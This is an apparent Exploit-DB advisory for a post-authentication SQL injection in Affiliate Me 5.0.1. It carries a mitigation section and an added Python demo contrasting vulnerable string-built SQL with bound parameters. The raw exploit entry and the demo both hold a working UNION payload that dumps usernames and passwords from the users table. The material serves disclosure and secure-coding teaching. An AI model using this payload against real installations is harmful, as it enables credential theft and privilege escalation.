Vendor: Affiliate Me
By: Faisal Albuloushi
CVSS: 6.4 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Affiliate Me
Affected Version From: 5.0.1
Affected Version To: 5.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2023

Affiliate Me Version 5.0.1 – SQL Injection

In Affiliate Me version 5.0.1 the `id` parameter of `admin.php?show=reply` is placed unsanitised into a SQL query, giving an authenticated admin-level user a UNION-based SQL injection. The published payload appends a SELECT over the `users` table that returns ID, USERNAME and PASSWORD for every account, including the super admin's, which is how a normal admin escalates to super admin. Exploitation requires an admin session (CVSS PR:L), so this is a post-authentication privilege escalation rather than an unauthenticated remote attack.

Mitigation:

The listing records no vendor patch (Patch Exists: NO), so at the time of publication there is no fixed version to update to. Until one is available, treat the issue as a code fix: pass the `id` value to the database as a bound parameter instead of concatenating it into the query string, and reject any value that is not a decimal identifier before the query is built. Because exploitation needs an admin login, restricting access to admin.php and reviewing which accounts hold admin rights limits who can reach the injection point; requests to `admin.php?show=reply` whose `id` value contains a quote or the word UNION are a simple log check for attempts.
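The following is an added example, not code from Affiliate Me or from the advisory author, illustrating both the injection described above and the parameterised fix recommended in the mitigation. It models the reply lookup with an in-memory SQLite database: the schema, the `replies` table and its column names are constructed for the demo, the query returns 4 columns where the real PHP/MySQL query returns 16 (which is why the advisory's payload pads to 16), and SQLite's `||` stands in for MySQL's `concat(...,0x3a,...)`. The vulnerable function concatenates the request value into the SQL text exactly as the advisory implies; the hardened pair validates the id as a decimal integer and binds it as data.

```python
"""Added example, not code from Affiliate Me or from the advisory author.

Models the bug class the advisory describes: the `id` value from
admin.php?show=reply is concatenated into a SQL string, so a UNION SELECT
appends rows from the `users` table (ID, USERNAME, PASSWORD) to the reply
result. Everything below is an assumption for the demo: the SQLite
schema, the `replies` table and its 4 columns (the real query returns 16,
which is why the advisory's payload pads to 16), and the `||`
concatenation that stands in for MySQL's concat(...,0x3a,...).
"""
import re
import sqlite3

# Constructed sample data; names and values are invented for this demo.
SCHEMA = """
CREATE TABLE users (ID INTEGER, USERNAME TEXT, PASSWORD TEXT, ROLE TEXT);
CREATE TABLE replies (id INTEGER, author TEXT, subject TEXT, body TEXT);
INSERT INTO users VALUES (1, 'superadmin', 'hash_of_superadmin', 'super');
INSERT INTO users VALUES (2, 'editor', 'hash_of_editor', 'admin');
INSERT INTO replies VALUES (7, 'editor', 'Re: payout', 'approved');
"""

# SQLite rendering of the advisory's payload: an id no row has, a UNION
# that pads to the query's column count and puts ID:USERNAME:PASSWORD in
# the last column, and a trailing comment that swallows the closing quote.
PAYLOAD = "-999' UNION SELECT 1,2,3,ID||':'||USERNAME||':'||PASSWORD FROM users-- -"


def make_db():
    """Create the constructed demo database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_reply_vulnerable(conn, id_param):
    """Vulnerable form: the request value becomes part of the SQL text."""
    sql = f"SELECT id, author, subject, body FROM replies WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def dump_users_via_injection(conn):
    """What the advisory's payload yields: one ID:USERNAME:PASSWORD per user."""
    return [row[3] for row in fetch_reply_vulnerable(conn, PAYLOAD)]


def validate_reply_id(value):
    """Allow-list gate: a reply id is a decimal integer, nothing else."""
    if not re.fullmatch(r"[0-9]+", str(value)):
        raise ValueError(f"rejecting non-numeric reply id: {value!r}")
    return int(value)


def fetch_reply_safe(conn, id_param):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT id, author, subject, body FROM replies WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("legitimate:", fetch_reply_vulnerable(db, "7"))
    print("injected:  ", dump_users_via_injection(db))
    print("bound:     ", fetch_reply_safe(db, PAYLOAD))  # no rows, no leak
    try:
        validate_reply_id(PAYLOAD)
    except ValueError as err:
        print("validated: ", err)
```

Binding alone is enough to neutralise the payload (the whole string is compared against `id` and matches nothing), but the validation gate is still worth keeping: it gives a clean rejection to log on instead of a silent empty result, and it blocks the value before it reaches any other code path that might still build SQL by hand.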

Exploit-DB raw data:

[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] Exploit:

[path]/admin.php?show=reply&id=[Injected Query]


[#] 3xample:

[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -


[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.